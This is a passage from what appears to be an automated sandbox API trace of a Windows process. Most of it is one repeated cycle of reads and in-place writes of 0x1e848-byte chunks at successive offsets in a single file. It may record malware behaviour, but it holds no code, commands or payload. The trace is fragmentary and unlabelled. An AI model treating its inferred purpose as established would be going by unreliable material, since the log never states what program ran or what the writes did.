liDistanceToMove=0x514cfd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.862] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.873] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x514cfd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.873] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.873] GetProcessHeap () returned 0x500000 [0119.873] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.873] GetProcessHeap () returned 0x500000 [0119.873] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.873] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x518a060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.874] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.885] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x518a060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.885] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.886] GetProcessHeap () returned 0x500000 [0119.886] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.886] GetProcessHeap () returned 0x500000 [0119.886] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.886] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x51c70f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.916] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x51c70f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.916] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.916] GetProcessHeap () returned 0x500000 [0119.916] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.916] GetProcessHeap () returned 0x500000 [0119.917] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.917] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5204180, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.917] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.934] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5204180, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.934] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.935] GetProcessHeap () returned 0x500000 [0119.935] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.935] GetProcessHeap () returned 0x500000 [0119.935] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.935] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5241210, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.935] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.947] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5241210, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.948] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.948] GetProcessHeap () returned 0x500000 [0119.948] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.948] GetProcessHeap () returned 0x500000 [0119.948] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.948] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x527e2a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.948] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.959] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x527e2a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.959] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.960] GetProcessHeap () returned 0x500000 [0119.960] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.960] GetProcessHeap () returned 0x500000 [0119.960] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.960] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x52bb330, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.960] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.970] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x52bb330, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.970] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.971] GetProcessHeap () returned 0x500000 [0119.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.971] GetProcessHeap () returned 0x500000 [0119.971] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.971] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x52f83c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.971] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0119.991] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x52f83c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.991] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0119.992] GetProcessHeap () returned 0x500000 [0119.992] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0119.992] GetProcessHeap () returned 0x500000 [0119.992] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0119.992] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5335450, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.992] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.003] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5335450, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.003] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.004] GetProcessHeap () returned 0x500000 [0120.004] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.004] GetProcessHeap () returned 0x500000 [0120.004] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.004] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x53724e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.004] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.014] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x53724e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.015] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.015] GetProcessHeap () returned 0x500000 [0120.015] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.015] GetProcessHeap () returned 0x500000 [0120.015] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.015] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x53af570, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.015] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.027] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x53af570, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.027] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.028] GetProcessHeap () returned 0x500000 [0120.028] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.028] GetProcessHeap () returned 0x500000 [0120.028] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.028] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x53ec600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.028] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.050] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x53ec600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.050] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.052] GetProcessHeap () returned 0x500000 [0120.052] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.052] GetProcessHeap () returned 0x500000 [0120.052] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.052] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5429690, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.052] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.065] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5429690, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.065] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.066] GetProcessHeap () returned 0x500000 [0120.066] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.066] GetProcessHeap () returned 0x500000 [0120.066] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.066] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5466720, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.066] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.077] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5466720, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.077] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.078] GetProcessHeap () returned 0x500000 [0120.078] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.078] GetProcessHeap () returned 0x500000 [0120.078] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.078] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x54a37b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.078] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.089] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x54a37b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.089] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.090] GetProcessHeap () returned 0x500000 [0120.090] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.090] GetProcessHeap () returned 0x500000 [0120.090] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.090] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x54e0840, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.090] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.101] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x54e0840, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.101] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.101] GetProcessHeap () returned 0x500000 [0120.101] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.101] GetProcessHeap () returned 0x500000 [0120.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.102] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x551d8d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.102] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.121] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x551d8d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.121] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.121] GetProcessHeap () returned 0x500000 [0120.121] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.121] GetProcessHeap () returned 0x500000 [0120.121] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.122] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x555a960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.122] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.134] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x555a960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.134] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.135] GetProcessHeap () returned 0x500000 [0120.135] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.135] GetProcessHeap () returned 0x500000 [0120.135] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.135] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x55979f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.135] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.193] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x55979f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.193] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.194] GetProcessHeap () returned 0x500000 [0120.194] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.194] GetProcessHeap () returned 0x500000 [0120.194] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.194] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x55d4a80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.194] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.206] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x55d4a80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.206] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.206] GetProcessHeap () returned 0x500000 [0120.206] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.206] GetProcessHeap () returned 0x500000 [0120.206] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.206] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5611b10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.207] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.225] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x5611b10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.225] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.225] GetProcessHeap () returned 0x500000 [0120.225] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.225] GetProcessHeap () returned 0x500000 [0120.226] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.226] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x564eba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.226] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.247] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x564eba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.247] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.247] GetProcessHeap () returned 0x500000 [0120.248] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.248] GetProcessHeap () returned 0x500000 [0120.248] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0120.248] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x568bc30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.248] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0120.258] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x568bc30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.258] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0120.259] GetProcessHeap () returned 0x500000 [0120.259] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0120.259] GetProcessHeap () returned 0x500000 [0120.259] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, 